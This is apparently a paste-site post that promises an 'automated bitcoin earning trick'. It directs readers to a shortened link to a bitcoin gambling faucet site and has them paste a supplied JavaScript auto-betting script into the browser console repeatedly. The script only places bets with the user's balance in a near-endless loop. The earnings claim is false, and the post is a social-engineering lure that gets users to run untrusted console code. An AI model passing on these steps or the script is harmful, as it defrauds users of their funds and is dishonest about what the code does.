Automated bitcoin Earning Trick (repost)


SUBMITTED BY: mollamolla

DATE: Sept. 17, 2016, 2:28 p.m.

FORMAT: Text only

SIZE: 3.2 kB

HITS: 762

  1. 1. Download Google Chrome on your computer.
  2. 2. Go to http://bit.ly/2cNYGil
  3. 3. Click the FREE BTC icon (FAUCET) on the the left-hand side of the site.
  4. 4. Do the CAPTCHA.
  5. 5. Copy the code below.
  6. //----------------------- code begin ------------------//
  7. var lastmessage = 0,
  8. autobet_speed = 0,
  9. normalbet_speed = 0,
  10. id = 0,
  11. timedCount, timer, lastYourBet = 0,
  12. lastAllBet = 0,
  13. lastBigBet = 0,
  14. autobet_halt, first_load = true,
  15. autobet_index = false,
  16. prev_balance = 0,
  17. bet_ids = [];
  18. function bet(bet, odds, type, callback) {
  19. $.ajax({
  20. url: '/api/bet.php',
  21. type: 'post',
  22. data: {
  23. 'bet': bet,
  24. 'game': odds,
  25. 'type': type == 0 ? 1 : 0,
  26. },
  27. dataType: 'json',
  28. success: function (data) {
  29. if (data.error) {
  30. autobet_halt = true;
  31. return;
  32. }
  33. },
  34. error: function (jqXHR) {
  35. autobet_halt = true;
  36. },
  37. complete: function (jqXHR) {
  38. var data;
  39. try {
  40. data = $.parseJSON(jqXHR.responseText);
  41. } catch (e) {
  42. data = false;
  43. }
  44. if (typeof callback === 'function') {
  45. callback(data);
  46. }
  47. }
  48. });
  49. }
  50. function auto_bet(params) {
  51. setTimeout(function () {
  52. var current_balance = parseFloat($('#balance-value').text());
  53. if (current_balance === 0)
  54. {
  55. autobet_index = false;
  56. return;
  57. }
  58. else if(params.current_bet > current_balance)
  59. params.current_bet = current_balance;
  60. bet(params.current_bet, params.odds, params.type, function (data) {
  61. var i, a, j, curbet;
  62. if (data) {
  63. params.current_run++;
  64. autobet_index = params.current_run;
  65. if (data.result == 0) {
  66. if (params.on_loss_return) {
  67. params.current_bet = params.bet;
  68. } else {
  69. params.current_bet *= params.on_loss_multiply;
  70. }
  71. } else {
  72. if (params.on_win_return) {
  73. params.current_bet = params.bet;
  74. } else {
  75. params.current_bet *= params.on_win_multiply;
  76. }
  77. }
  78. curbet = params.current_bet.toString();
  79. if (curbet.indexOf('e') > -1) {
  80. i = parseInt(curbet.substr(0, curbet.indexOf('e')).replace('.', ''));
  81. a = parseInt(curbet.substr(curbet.indexOf('e') + 2));
  82. curbet = i.toString();
  83. for (j = 1; j < a; j++) {
  84. curbet = '0' + curbet;
  85. }
  86. params.current_bet = '0.' + curbet;
  87. }
  88. params.current_bet = +('' + params.current_bet).substr(0, ('' + params.current_bet).indexOf('.') + 9);
  89. if (data.balance < data.current_bet) {
  90. return;
  91. }
  92. }
  93. if (params.current_run < params.total_runs) {
  94. if(params.current_bet < params.bet)
  95. params.current_bet = params.bet;
  96. auto_bet(params);
  97. } else {
  98. params.current_bet = params.bet;
  99. autobet_index = false;
  100. auto_bet(params);
  101. return;
  102. }
  103. })
  104. }, autobet_speed);
  105. }
  106. params = {
  107. odds: 20.81,
  108. type: 0,
  109. bet: 0.002,
  110. total_runs: 2147483647,
  111. on_loss_return: false,
  112. on_loss_multiply: false,
  113. on_win_return: false,
  114. on_win_multiply: false,
  115. current_run: 0,
  116. current_bet: 0,
  117. };
  118. params.current_bet = params.bet;
  119. autobet_halt = false;
  120. autobet_index = 0;
  121. auto_bet(params);
  122. //------------------------- code end ---------------------------//
  123. 6. Click CTRL + Shift + J, now click CTRL + V and press enter, repeat that about twenty times to make the script run at max speed.
  124. 7. Wait 24 hours, then click the CASHOUT button.
  125. 8. Go to http://bit.ly/2cNYGil , type in how much BitCoin you want to take out, fill out the fields and click submit.

comments powered by Disqus